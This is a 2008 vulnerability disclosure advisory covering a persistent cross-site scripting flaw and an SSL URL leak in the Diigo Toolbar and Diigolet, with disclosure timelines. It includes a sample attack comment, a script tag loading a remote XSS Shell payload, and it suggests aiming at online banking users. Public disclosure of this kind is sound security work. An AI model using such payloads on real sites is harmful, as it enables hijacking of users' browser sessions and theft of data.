Diigo Toolbar - Global XSS and Information Leakage in SSL URLs

== Global XSS ==
Diigo is (http://www.diigo.com/) a social bookmarking and sharing
application which allows users to see other users comments and notes
for every website. For this feature users should use Diigolet
bookmarklet or Diigo Toolbar - http://www.diigo.com/tools. These are
almost mandatory to use Diigo and almost all Diigo members have them
installed.

An attacker can do Cross-site Scripting in these public comments and
that comment will affect any other user of Diigo Toolbar and Diigolet
who visits the website. This means a Diigo user can backdoor any
website in the internet easily with a permanent XSS and any other
Diigo user who visits this website will be affected.  Vulnerability
exists in:
* Diigo Toolbar for IE,
* Diigo Toolbar for FF,
* Diigolet for IE and FF,

These comments will be injected into the current domain context, thus
an attacker can execute a Javascript code in the target domain,
Target URL can be over SSL as well. All Diigo tools users are affected
from this vulnerability.

For an attacker this is a perfect opportunity to use some XSS bot
manager application such as XSS Shell, Also an attacker can attack
high profile websites such as online banking applications. Considering
you can search in shared bookmarks so you can actually people who uses
a certain online banking application.

Sample attack comment can be:
<script src="http://example.com/xssshell/"></script>


== Fix ==
Download latest version of Diigo Toolbar

== Disclosure Timeline ==
* 12 May 2008 - Vendor Informed
* 2 June 2008 - Another e-mail to vendor to check if they've fixed
* 3 June 2008 - Vendor informed me that it's fixed
* 20 June 2008 - Public Release


== Information Leakage in SSL URLs ==
Diigo toolbar is sending all SSL URLs to their servers over HTTP for
shared comment feature, which might cause to leak session_ids over URL
or any other sensitive information transferred over URL.


== Fix ==
User can not opt-out from this feature. There is no known fix, this
looks like considered as a feature not a bug.

== Disclosure Timeline ==
* 9 May 2008  - Vendor Informed, Couple of mail exchanged and I tried
to explain why this is bad, it didn't work.
* 12 May 2008 - Ask for an update, No response.
* 20 June 2008 - Public Release


--
Ferruh Mavituna
http://ferruh.mavituna.com